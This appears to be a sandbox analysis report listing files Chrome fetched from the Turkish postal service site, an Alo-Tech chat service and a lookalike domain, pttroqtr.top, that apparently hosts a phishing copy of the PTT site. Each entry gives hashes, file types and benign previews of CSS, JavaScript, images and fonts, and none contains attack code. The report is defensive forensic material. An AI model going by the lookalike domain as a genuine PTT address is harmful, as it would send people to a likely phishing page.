                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..+qIDATx....u...`T.;.;.."..'.#.j.C..X....J.....J...IO-GPt....-m\.Tz.........!. ...8....^...[~.....8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@.....8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8!..@...@...@................8...8...8..!...!...!...!..@...@...@................8...8...8..!...!...!...!..@...@...@................8...8...8..!...!...!...!..@...@...@...........[7..}..?b{Zo.-..[.].?|...#)......-.....|..E..K.N.....m...v%.]...P'.......z.T.k.J..@w.[....8.8...4C.P..C....L........_.Y.......3.....`/...1...=.xQ;7.@W...o[....m....fN...].o.lz~@.m.U~.saN...].o1`aZo....>sgu..p(.8..r..iBf........6Q+'..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):11362
                                                                                                                                                                                            Entropy (8bit):4.827460510076756
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:72kx64y/BHFEhF7Qyhhd7p7ZFkgsJF7Ad9iNxfgDFMyFHgY90isnOdc:7bQdFEhF7xhjFiJFszFTFfc
                                                                                                                                                                                            MD5:A0B72AE692601CD344CECB38DD306E69
                                                                                                                                                                                            SHA1:CD4C8370A2C1B2653F91EC59CF3563CA93C004C5
                                                                                                                                                                                            SHA-256:1684236B0C382AC4F347AA810A14EE04C79B448CF6098F5BEBBA6E532C8391C6
                                                                                                                                                                                            SHA-512:29A8AB6C8915DAF66BAB7D76A0359B4BFE374C0B6268E53F259A9BD13D71AA92780DDA70CECD21D115A3AFA389562B411D99485C0C5AEA4643AF9059F4674E8D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/css/page_spa.css
                                                                                                                                                                                            Preview:.center {. text-align: center;. width: auto;.}..body {. font-family: Tahoma, Geneva, sans-serif;. color: #000;. font-size: 12px;. padding: 0;. margin-top: 10px;.}...panel {. margin-bottom: 2px;. margin-right: 2px;. margin-top: 0;.}...panel .panel-heading, .panel > :first-child {. border-top-left-radius: 0;. border-top-right-radius: 0;.}...panel-heading {. position: relative;. height: 50px;. padding: 0;. border-bottom: 1px solid #eee;. background: #CE0000;.}...panel-control {. height: 100%;. position: relative;. float: right;..}...panel-title {. font-weight: normal;. padding: 0 0 0 20px;. font-size: 1.416em;. line-height: 50px;. white-space: nowrap;. overflow: hidden;. text-overflow: ellipsis;. color: #FFF;.}...panel-control > .btn:last-child, .panel-control > .btn-group:last-child > .btn:first-child {. border-bottom-right-radius: 5px;.}...panel-control .btn, .panel-control .dropdown-toggle.btn {.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):140991
                                                                                                                                                                                            Entropy (8bit):5.264901399717059
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:M9vlesNeZ3jR4o2RQ/hmXz4fwKYhOIAMiUqI8ix+vQm1dqNYQyI:M9aJmvKgiUB8ixnyI
                                                                                                                                                                                            MD5:1D0C748A53E59829E7489BC32E1BF6EA
                                                                                                                                                                                            SHA1:245BA9E40E10D5113B0BDE991134D26321FFA259
                                                                                                                                                                                            SHA-256:65A5CB546ABBAB311927A21D335453FAA75C1D5F35E1F058E9934166741C6B95
                                                                                                                                                                                            SHA-512:F3903CE2E309DACBA41CC8A904C59D5F04D8204503703FC77DBAF47F17954B5B328D0A28A9028ED209C203A7F04037F1382F768B018BE93857CAC00DA0ED2972
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/chunks/framework-0438cefc59f69f60.js
                                                                                                                                                                                            Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{2760:function(e,n,t){var r=t(2466),l=t(1062);function a(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var o=new Set,u={};function i(e,n){s(e,n),s(e+"Capture",n)}function s(e,n){for(u[e]=n,e=0;e<n.length;e++)o.add(n[e])}var c=!("undefined"===typeof window||"undefined"===typeof window.document||"undefined"===typeof window.document.createElement),f=Object.prototype.hasOwnProperty,d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                            Entropy (8bit):4.180365114215879
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (7518)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):7569
                                                                                                                                                                                            Entropy (8bit):5.420173393523585
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:wAgS8hTvHoDvCaBbIw3uwCP8kZ8xQuP3BRGekLuvKDcCaBbIwb6wCP63mEq6QDLk:evHoGmzbCP8nQuPxQLvxmv/CP6+X82u
                                                                                                                                                                                            MD5:3D790CBBD856AB0CD5F882BD21AE4599
                                                                                                                                                                                            SHA1:9A08AF38B188DA423EBFCED9C3FAB45B148EA96E
                                                                                                                                                                                            SHA-256:E07B05A263F20A9B350DE296AD362C892323288C68A05E8A8FC1D1E1CF532949
                                                                                                                                                                                            SHA-512:7B7A71915B9E34A0730DAF6E0F357EB3EC9574A60E2C01476818467EB97E1A5C1814F3C6342E4B4EB202397CD258D16427949E5D216E97F6BBD7EFB4979265D2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5405],{5557:function(e,t,n){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return n(8272)}])},8272:function(e,t,n){"use strict";n.r(t),n.d(t,{__N_SSP:function(){return H},default:function(){return B}});var r=n(3288),s=n(8082),a=n(4926),o=n.n(a),i=n(8196),c=n(9348),u=n(6731),l=n.n(u),f=n(2466),d=n(3395),p=n(5834),y=n.n(p),h=n(1011);var m=function(e){var t=e.stateAction;return(0,r.jsxs)("div",{id:"msm_shipment_time",className:y().container,children:[(0,r.jsx)("i",{onClick:function(){t(!1)},className:"fa-solid fa-xmark"}),(0,r.jsx)("div",{className:y().body,children:(0,r.jsx)(h.Z,{})})]})},_=n(8565),x=n.n(_),v=n(2718),j=n(3230),b=n(9792),g=n(3198),A=n.n(g);function N(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=new Array(t);n<t;n++)r[n]=e[n];return r}function S(e,t,n,r,s,a,o){try{var i=e[a](o),c=i.value}catch(u){return void n(u)}i.done?t(c):Promise.resolve(c).then(r,s)}function T(e){return function(){var t=this
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):15414
                                                                                                                                                                                            Entropy (8bit):7.802234231177533
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:o5uVjKZV0gFJcwDUs0uZEsODybond41ShLNDCfZ8TcQc8S:guVjKbcwDnqsODysndISzDaiJS
                                                                                                                                                                                            MD5:37B5D4B2CE91DDFC037F3172C9A54549
                                                                                                                                                                                            SHA1:C463FB17563D029985E7E89487ADD1EF1560F8E0
                                                                                                                                                                                            SHA-256:8C0DF3DA867E9D1F84C96E7CD38B654DD053108EC72C6E25A701A71603374524
                                                                                                                                                                                            SHA-512:15EC6031EBE54A1D3B14202CAF66A5E09153829819B50C85AABE7DAB0E6C3D764D9EBAFAD25FF6AA6B82B5CC79178F695DBFE38DB27474D319553D6A72C4E091
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/37.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..;.IDATx...m.+.}.....D.R.b)...d..2y..h.:.-..p.^......r./.;....(I{y.'6.6..q..{...`8.xQ7}."..7...F$G.,n.9v"W\[.l.2;...v.......a........y..9g........j.K.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q... .........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ..........B....!.....8.........q... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... ..........B....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B...k..J..V.+)..@..W.{.w.?.^]}u.W...N.S.u...C..%.PF..R...QQ..V...{....nxkz.M}.@....z..!...
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (22359)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):53487
                                                                                                                                                                                            Entropy (8bit):5.658840042448801
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:j1MrlEtazMvS1FVnUbMsYG7JYYG7BfVSms88E+g9X7:j1E9UbcSbSBb
                                                                                                                                                                                            MD5:9EC37AD8C9D7CACCBA07795B4155F169
                                                                                                                                                                                            SHA1:9179073C6D56F591B4298CEFB72B02819E51C647
                                                                                                                                                                                            SHA-256:2DD339F2861FCFFD8B0A703CA7F81253542743D9936B33D2E15F2FF89D46D084
                                                                                                                                                                                            SHA-512:2594C9230996A13AFFCC132EEAB431179308C2C389345FABB44B26E950783FBB9554CA5CEE7AE54E4B9B030F05253036284977FD994EA95A0EFF679A08DCB5CF
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/2dd339f2kFGym.css
                                                                                                                                                                                            Preview:@media screen and (min-width: 767px){.main-content{margin-top:90px}}@media screen and (min-width: 769px) and (max-width: 1047px){.main-content{margin-top:180px}}body #s4-ribbonrow{display:none}@media screen and (max-width: 468px){#webobj_portal{padding-top:30px}}body{overflow:hidden;background-size:cover;background-repeat:no-repeat}.ms-backgroundImage{background-image:url(./8b4af40ckFGym.css)}#s4-ribbonrow{position:relative}#s4-workspace{overflow:auto;position:relative}h3{margin:auto}img{-webkit-tap-highlight-color:transparent}iframe{border:0}input,button{vertical-align:middle}button{min-width:6em;margin-left:10px}input[type=button]:hover,input[type=reset]:hover,input[type=submit]:hover,button:hover{border-color:#92c0e0;background-color:#e6f2fa}input[type=button]:active,input[type=reset]:active,input[type=submit]:active,button:active{border-color:#2a8dd4;background-color:#92b7d1;background-color:#92c0e0}a:visited{color:#639;-webkit-text-decoration:none;text-decoration:none}a:hover,a:ac
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):77678
                                                                                                                                                                                            Entropy (8bit):5.213189247182647
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:w1BdHluH4ayXM1ZFnqHfbm2GL8Y33xQUOWcKPX+tcQ1ZvGgbng5iCaK828:p4aycxnYU33xQ3eg3CaK8v
                                                                                                                                                                                            MD5:A68954C92CBC306929A026FB8BE5389E
                                                                                                                                                                                            SHA1:4B8AC7EB075343DA16FEE848C9B6A6C80B6C1484
                                                                                                                                                                                            SHA-256:83500803B415AFC9A4F8496789CBA919D635DDE3ADC041A8A69B62F71071BCA7
                                                                                                                                                                                            SHA-512:2D1E103916519B5352EEE20A58A33D5075E43BF7358EF516320738E2C2B9154C8F1B8EC6CC6751FB8F6A7EB9994B9D56EAE4BC589BBE03605010BFE06CF61AA2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://service-edge.alo-tech.com/static/chat_files/jss/chat_v3.min.js?v=13
                                                                                                                                                                                            Preview:function defineAloChat(){var c={app_environment:"local",name:"Alotech Chat JS",hostname:"",username:"",chatText:"#chat-text",chatMessage:".mar-btm",btnSendMessage:"#btnSendMessage",aloChatLogout:"#alo-chat-logout",modalChatHistory:"#modalChatHistory",btnChatHistoryY:"#btnChatHistoryY",btnChatHistoryN:"#btnChatHistoryN",modalChatLogoutConfirm:"#modalChatLogoutConfirm",btnChatLogoutConfirmY:"#btnChatLogoutConfirmY",btnChatLogoutConfirmN:"#btnChatLogoutConfirmN",inputUserNameSurName:"#name",queueMessage:"#queue_message",footer:"#footer",chatTags:"#chat_tags",inputPhoneNumber:"#phone_number",inputEmail:"#email",user_email:"",user_phone_number:"",uid:"",cwid:"",ws_server:"chatserver.alo-tech.com",lang:"en",tags:[],optional_email:"",optional_phone:"",hide_email:"",hide_phone_number:"",title:"",title_background_color:"",title_text_color:"",subtitle:"",height:300,width:300,queue:[],legal_requirements:0,widget_version:"",frmStartChat:"#frmStartChat",inputLang:"#lang",inputActiveChatKey:"#active
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):15414
                                                                                                                                                                                            Entropy (8bit):7.802234231177533
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:o5uVjKZV0gFJcwDUs0uZEsODybond41ShLNDCfZ8TcQc8S:guVjKbcwDnqsODysndISzDaiJS
                                                                                                                                                                                            MD5:37B5D4B2CE91DDFC037F3172C9A54549
                                                                                                                                                                                            SHA1:C463FB17563D029985E7E89487ADD1EF1560F8E0
                                                                                                                                                                                            SHA-256:8C0DF3DA867E9D1F84C96E7CD38B654DD053108EC72C6E25A701A71603374524
                                                                                                                                                                                            SHA-512:15EC6031EBE54A1D3B14202CAF66A5E09153829819B50C85AABE7DAB0E6C3D764D9EBAFAD25FF6AA6B82B5CC79178F695DBFE38DB27474D319553D6A72C4E091
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..;.IDATx...m.+.}.....D.R.b)...d..2y..h.:.-..p.^......r./.;....(I{y.'6.6..q..{...`8.xQ7}."..7...F$G.,n.9v"W\[.l.2;...v.......a........y..9g........j.K.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q... .........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ..........B....!.....8.........q... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... ..........B....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B...k..J..V.+)..@..W.{.w.?.^]}u.W...N.S.u...C..%.PF..R...QQ..V...{....nxkz.M}.@....z..!...
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4546
                                                                                                                                                                                            Entropy (8bit):7.904885231107719
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:ar1jToly4eiMeo/826voWBX99AmMLGHtGNkWcebQxy:ufVR5eo/8Vvo2XYLGHYrcebQxy
                                                                                                                                                                                            MD5:F33F254A85BDD91ACA8C88DF12D99ACB
                                                                                                                                                                                            SHA1:C85F7731A9B5BD2B95394D2145B6F63B1039ACE1
                                                                                                                                                                                            SHA-256:4EC10EE6A2F0D8A0FD1E6CC0A231AEF9ED1E9447582D08795436FC33330EBC23
                                                                                                                                                                                            SHA-512:076B426C5B3C3C9D6B507300F5C504680683DD3793CEFCA18310BDE9D7210297C0567DC3B7C858B79ABBCAF2B0D16A8EC8BC81D438B923D23401F85FF902C345
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:RIFF....WEBPVP8X...........N..ALPHj........9......I..m[...m.v...m...R+.*..s.<q.c^.z.............z.....:i)m.n).e.{..p.Y.,C.y..N...;..s.i.o.YF.....|......>.S....../.....p>lm..g.\.B.......n...n3.7......XL...*9...68...7.<v...Z..!....S.c.!K.....\....c....,..Ra..80.1...$....+...|.h...a.....c..#.e.~...F=.-.9AM..Z.[..S|...BVk.O...b...w.~...R.$. }6.k.L..r..qT.\.Pj.\}.....Y.@.@Tk..=..a....A.M.p.%......Z.Vxf.Lz.....!D.~........5.h.H1."0%.*7.[k......N5..WO...s.!I...0'.....K1fR.g..`......I!f.....;|1.x....N.O..p....u.....B..b.._>jq.9..6.O.p..t..8.,x..Q.!K.1H./.=..m.S..3a'I..R..}<v2.,r...b....._n[o.x...t+n...&.@z{[`H.[../...$..$.?|Vp.^.r%%...D.`...k.4.;.L....BRk.Q.....:UO!W.z.;)2...=.{..G....._...S.t.J.l}~......&).R.Z.7...6`.......x..........{V.o...v..S..Y.K.T.5.2.]0..1.e..........q...F.')d..,.8....M...R....T{.........L?~..o........-....._./.."E.....b4....~...Z.Wm......k......9....>z..S..p.=....`iu..;.W)..)Ho.....pT5..r....U....'|...#...O.O
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1878
                                                                                                                                                                                            Entropy (8bit):5.099221191787203
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:t4LE1XD/D1rHxmS2CHGFCt0u9cLp/NW5Aj5AfCJCDh2GhbIL82Nsd8xbpTGPjehh:+6XjlHoS2CmYoXWNbAx5p0KyD0l
                                                                                                                                                                                            MD5:B441F960B07A4EC1688F2EDB043F767A
                                                                                                                                                                                            SHA1:848D59D73CC5324CD222CE97D6FFD48FF7D8021F
                                                                                                                                                                                            SHA-256:9160F6D5855A884D542A3DE24B58E892616D74CFA9BDD9816C209350003EB71D
                                                                                                                                                                                            SHA-512:133D9616277EF27F0430DCB5E7D1D5C2023D2BBE8AB06B286B2F8B395B85DE2B6E330779F6906672860C660000C080E46D0F7F1CAB8CD5E036415708F1C06607
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="54" height="54" viewBox="0 0 54 54">.. <defs>.. <filter id="Ellipse_369" x="0" y="0" width="54" height="54" filterUnits="userSpaceOnUse">.. <feOffset dy="3" input="SourceAlpha"/>.. <feGaussianBlur stdDeviation="3" result="blur"/>.. <feFlood flood-color="#2c2828" flood-opacity="0.259"/>.. <feComposite operator="in" in2="blur"/>.. <feComposite in="SourceGraphic"/>.. </filter>.. <clipPath id="clip-path">.. <rect width="8" height="14" fill="none"/>.. </clipPath>.. </defs>.. <g id="Group_11280" data-name="Group 11280" transform="translate(604 -1140) rotate(90)">.. <g id="Group_140" data-name="Group 140" transform="translate(1146 559)">.. <g transform="matrix(0, -1, 1, 0, -6, 45)" filter="url(#Ellipse_369)">.. <g id="Ellipse_369-2" data-name="Ellipse 369" transform="translate(45 6) rotate(90)" fill="#fff" stroke="rgba(136,152,170,0.5)" stroke-w
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (3653)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3701
                                                                                                                                                                                            Entropy (8bit):5.228131891228675
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:kNfY1SNf36JTAgtUNflBI3EkKHWRufQWTWDKDWDggZj2rZlVgZ1t:Ou8v6JT7+jCKHfqXnNJ
                                                                                                                                                                                            MD5:239EE53CB3C3C49D0E1B9D0D23E5DA52
                                                                                                                                                                                            SHA1:AA127BC5FD2B93B3ACA49EC673C37881094F9629
                                                                                                                                                                                            SHA-256:C05E73D2B9E70CF33428CAF11087915B75F82B2F4342048EE54B823EB2A99431
                                                                                                                                                                                            SHA-512:E0493B3844DA9B8D97837FF39218CF76F83296A6271D3B66FC1DDEBB0B5528AF37EFA0E57ADAB09246C908C0FEA0B39F74D508E6261E1B17829BAB7562FAB6B8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.styles_container__uvZ2S{position:fixed;top:0;right:0;left:0;bottom:0;background-color:rgba(0,0,0,.8);-webkit-backdrop-filter:blur(5px);-moz-backdrop-filter:blur(5px);-o-backdrop-filter:blur(5px);backdrop-filter:blur(5px);z-index:5;overflow-y:auto}.styles_container__uvZ2S>i{position:absolute;top:1.5rem;right:2rem;color:#fff;font-size:1.5rem!important}.styles_container__uvZ2S>.styles_body__Y9gTP{margin-top:4.5rem;padding:0 2rem}.styles_container__sX9Do{position:fixed;top:0;right:0;left:0;bottom:0;background-color:rgba(0,0,0,.8);-webkit-backdrop-filter:blur(5px);-moz-backdrop-filter:blur(5px);-o-backdrop-filter:blur(5px);backdrop-filter:blur(5px);z-index:5;overflow-y:auto}.styles_container__sX9Do>.styles_inputField__2P_Kd{position:relative;margin:4rem 1rem 1rem;padding:1rem}.styles_container__sX9Do>.styles_inputField__2P_Kd>input[type=text]{background-color:#eee;width:100%;height:3rem;padding:0 9rem 0 1rem;border:none;border-radius:2rem}.styles_container__sX9Do>.styles_inputField__2P_Kd>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:OpenType font data
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):111508
                                                                                                                                                                                            Entropy (8bit):6.108051472779374
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:Xfz/i5rBzzrvJSpJzXE8wNNNsf6cNVP28btzbgEL2oPLT:Xbq/DobE8wNNNsf6cNVJt/go2ov
                                                                                                                                                                                            MD5:2616E1C355C564A4E67F09308EF7FF89
                                                                                                                                                                                            SHA1:D8E956ABB65E24A5A1CFD91FFC08EC7C2E4431E0
                                                                                                                                                                                            SHA-256:EF052A516F72DF61400E58519B9D52DB19C8C67D11849CDD6058C3A77FE2A0B4
                                                                                                                                                                                            SHA-512:07475E92594F16BDFBBFE75E54284B192445447BD31F61AA6B669CC5F60F1D793F6F0D011124834B6DBAD4A425BE93CCB27D6438717D2B767990545FF3A393F4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/media/OmnesRegular.2b095194.otf
                                                                                                                                                                                            Preview:OTTO.......PCFF .@u.........DSIG............GDEF...........:GPOS..cZ.......GSUB._W...}...%>OS/2c{k....d...`cmap...H........head..?........6hhea.`.........$hmtxh.F........dmaxp.YP.........nameX;9i.......Ppost...F...`... ...........d_.<............_.........A.!.f.................%...........j.............j...........o.........U.v...................................................................................*.........1.F...........w.......................X...........b...........p.......................4...........R...........l.....................8...........8...........b.............r...........|...................................................................................&...........@...........Z...........tCopyright (c) 2017 by Joshua Darden, Inc. All rights reserved..Omnes is a trademark of Joshua Darden, Inc.OmnesRegularDardenStudio: Omnes Regular: 2018:<TkD-7986-719bfb96dbbb179f646c3d784fe546634ce034ba>Omnes RegularVersion 001.004Omnes-RegularDarden StudioJoshua Dardenhttp
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):214512
                                                                                                                                                                                            Entropy (8bit):5.844382922581424
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:6ZOJBndfIwfpzT0dWNiLmhcLaN/xpjejNvT3XdhryvR6+4qTSQLzLvU4VPQMW:64JZtjTGheveqTSQLznVPQMW
                                                                                                                                                                                            MD5:930C82182D46261C0E4629CFF77E8927
                                                                                                                                                                                            SHA1:B7C4E4039ED0E97894B00AD22C969A92F40C8D0C
                                                                                                                                                                                            SHA-256:B46AF6886ED3474AD1173B2A42477CC6712612F5D676DB184929CF39DBD9A6B2
                                                                                                                                                                                            SHA-512:4E8980FE3BC8E3794240F363593B3E40F3C59C045E3F9FD60E3DD2A4799A1C9E030653EAA3DA0BD4803DBCBD1DF493654B7246916E186E54CC089DBD1F48D88E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{242:function(e,t,n){var r={"./en/GetLanguageResourceResponse":[6855,6855],"./en/GetLanguageResourceResponse.json":[6855,6855],"./tr/GetLanguageResourceResponse":[6219,3401],"./tr/GetLanguageResourceResponse.json":[6219,3401]};function o(e){if(!n.o(r,e))return Promise.resolve().then((function(){var t=new Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}));var t=r[e],o=t[0];return n.e(t[1]).then((function(){return n.t(o,19)}))}o.keys=function(){return Object.keys(r)},o.id=242,e.exports=o},3197:function(e,t){"use strict";t.parse=function(e,t){if("string"!==typeof e)throw new TypeError("argument str must be a string");for(var r={},o=t||{},i=e.split(";"),c=o.decode||n,s=0;s<i.length;s++){var l=i[s],u=l.indexOf("=");if(!(u<0)){var f=l.substring(0,u).trim();if(void 0==r[f]){var d=l.substring(u+1,l.length).trim();'"'===d[0]&&(d=d.slice(1,-1)),r[f]=a(d,c)}}}return r},t.serialize=function(e,t,n){var a=n||{},i=a.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 1772 x 945, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):29339
                                                                                                                                                                                            Entropy (8bit):7.356325846196763
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:L/VTX6DKxDUWnEooJ+NMvlF+Dir+WEtOaUfw4LBQbbr3NwPHpK7AGW3T6CmPDwD:L/kDCJ1y7UU+WwDUfkbLOpGnPUD
                                                                                                                                                                                            MD5:AEBDDA95DC8CFFFEE118C2F7CDF158DC
                                                                                                                                                                                            SHA1:FD547F5F7DE14D0F8E234B6AAF21CE10C81976A1
                                                                                                                                                                                            SHA-256:CDABE7A61B3729FECD8DDFC82EB2BEAF3EE622FCD58B1774E39926DADA88880B
                                                                                                                                                                                            SHA-512:39AE9C324315EC8DBE3A080909E6AB8EF7019D0C36AEF4F418DC9905839BB684AD5A5A1A05C8BE820165522EBB07D7FF8C6CF8326FA8905DC1620B92947313DE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttem.alo-tech.com/storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true
